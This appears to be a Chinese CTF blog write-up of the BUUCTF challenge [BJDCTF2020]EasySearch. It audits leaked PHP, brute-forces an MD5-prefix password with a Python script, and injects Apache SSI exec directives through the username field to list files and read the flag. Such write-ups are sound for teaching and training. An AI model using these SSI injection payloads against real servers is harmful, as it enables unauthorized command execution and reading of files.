web buuctf [BJDCTF2020]EasySearch

最新推荐文章于 2024-02-17 12:51:12 发布
最新推荐文章于 2024-02-17 12:51:12 发布
阅读量523 收藏 2
点赞数
文章标签: Apache SSI shtml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/124117632
版权

知识点:Apache SSI漏洞

Apache安全漏洞_0ak1ey的博客-CSDN博客_apache漏洞

Apache SSI远程命令执行漏洞_0ak1ey的博客-CSDN博客_apache命令执行漏洞

Apache SSI 远程命令执行漏洞 - MCY5 - 博客园

1.开题:

 看到题目的时候,我就准备用dirsearch扫描,但是没有扫描出来,我又御剑扫了一遍,第一遍没扫出来,我把线程改成1才扫出来的,

2.贴源码

<?php
	ob_start();
	function get_hash(){
		$chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
		$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
		$content = uniqid().$random;
		return sha1($content); 
	}
    header("Content-Type: text/html;charset=utf-8");
	***
    if(isset($_POST['username']) and $_POST['username'] != '' )
    {
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {
            echo "<script>alert('[+] Welcome to manage system')</script>";
            $file_shtml = "public/".get_hash().".shtml";
            $shtml = fopen($file_shtml, "w") or die("Unable to open file!");
            $text = '
            ***
            ***
            <h1>Hello,'.$_POST['username'].'</h1>
            ***
			***';
            fwrite($shtml,$text);
            fclose($shtml);
            ***
			echo "[!] Header  error ...";
        } else {
            echo "<script>alert('[!] Failed')</script>";
            
    }else
    {
	***
    }
	***
?>

 审计代码,代码中

判断条件下进入
        $admin = '6d0bc1';
        if ( $admin == substr(md5($_POST['password']),0,6)) {

password经过md5加密后的前6位字符为6d0bc1

 代码中提到shtml,其实就应该想到和Apache SII有关

3.写脚本,生成password

import hashlib

for i in range(10000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] =='6d0bc1':
       print(i)
       print(a)

运行python后: 

2020666
6d0bc1153791aa2b4e18b4f344f26ab4
2305004
6d0bc1ec71a9b814677b85e3ac9c3d40
9162671
6d0bc11ea877b37d694b38ba8a45b19c

4.随便填个用户名,密码选择上面三个中的一个进行登录,抓包

 抓到隐藏页面,

 添加XFF,没有变化

5.回看代码

$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
         ***
         ***
         <h1>Hello,'.$_POST['username'].'</h1>
         ***
	     ***';
fwrite($shtml,$text);
fclose($shtml);

将username的值传到text,再将text内容写到shtml文件,shtml文件是在public路径下,名字为get_hash()后的shtml文件

 

 令username=<!--#exec cmd=”ls” -->

 查看该shtml文件

 emm,不对

next:

<!--#exec%20cmd%3d"ls%20../"%20-->

 next:

<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2" -->

 

flag{8db75e8e-c808-4b31-a4a9-fbf7385e42e9}

半杯雨水敬过客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF部分web题目
05-06
写题记录
[BJDCTF2020]EasySearch
Yb_140的博客
10-28 779
信息收集+Apache SSI
[BJDCTF2020]EasySearch1 不会编程的崽
最新发布
不会编程的崽的博客
02-17 564
dirmap后台文件扫描,shtml ssl注入
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
2020年最新web寄生虫程序.zip
09-04
2020年最新web寄生虫程序,最新程序 泛目录,远程调用,SEO霸屏 站群最好程序 百度 搜狗 360 各大搜索引擎快速收录引蜘蛛爬行
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
Web安全漏洞指导手册.pdf
07-25
Web安全漏洞指导手册
精简C/C++代码编辑器
09-21
这个代码编辑器很小,支持C\C++代码的颜色提示功能,对Java也部分支持,支持代码自动补全。 另外要声明一下,这个编辑器是我在一款C++编译器中提取的。去除原来的编译器中不必要的功能。
EasySearch
03-16
Make the search easyly HOW TO INSTALL ============== Please copy the easysearch.jar to your JBuilder lib/ext folder, and re-start JBuilder. HOW TO UNINSTALL ================ Exit from JBuilder, and remove easysearch.jar from your JBuilder lib/ext folder. HOW TO USE ========== 1. Select some text in JBuilder Editor pane or copy some text into clipboard. 2. Click the Search button in toolbar, it will search the next text from the cursor position. 3. Click the Highlight button in toolbar, it will highlight all the matched text in editor pane. 4. Ctrl-Up Search the previous text. 5 Ctrl-Down Search the next text.
第六十题——[BJDCTF2020]EasySearch
分享简单的安全技术
05-08 187
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt
[BJDCTF2020]EasySearch Apache SSI漏洞
m0_64180167的博客
09-20 461
这道题有点意思 是SSI 漏洞照样 我们先熟悉SSI漏洞是什么。
buuctf web
08-15
回答:根据引用和引用的内容,buuctf web应该是指buuctf比赛中的一个web题目。其中可能涉及到Tornado作为非阻塞式服务器的使用,以及render函数的使用。而根据引用的内容,buuctf web题目可能存在一些漏洞,比如SSRF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值